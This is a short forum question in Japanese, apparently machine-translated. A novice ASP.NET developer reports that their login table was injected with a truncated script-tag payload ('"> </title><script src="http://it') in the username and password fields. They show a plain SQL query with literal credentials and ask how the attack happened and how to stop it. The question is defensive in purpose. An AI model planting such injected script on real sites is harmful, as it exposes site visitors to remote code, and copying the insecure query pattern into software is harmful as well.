私はasp.net開発に不慣れです
ユーザー名とパスワードを使用してログインフォームを作成します
私は自分の仕事を終えましたが、どのように私のlogin
テーブルに一種のスクリプトを注入したか
ユーザー名
"> </title><script src="http://it
パスワード
"> </title><script src="http://it
簡単なクエリを次のように記述しました
SELECT * FROM user WHERE userid = 'admin' AND password = 'ms2012'
誰かがユーザー名とパスワードのテキストボックスに挿入したと思いました
しかし、私は彼らがどのようにしたのか理解できません。どのように更新したか、またそれを回避するにはどうすればよいか、誰か説明できますか?